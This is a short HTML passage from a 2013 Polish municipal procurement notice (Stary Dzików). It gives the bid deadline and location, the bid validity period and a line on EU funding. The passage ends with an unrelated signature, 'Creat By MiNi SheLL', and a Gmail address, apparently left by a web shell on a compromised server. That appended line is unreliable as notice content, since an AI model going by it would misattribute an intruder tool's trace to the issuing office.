<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 09:00, miejsce: Urząd Gminy w Starym Dzikowie ul. Kościuszki 79; 37-632 Stary Dzików pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com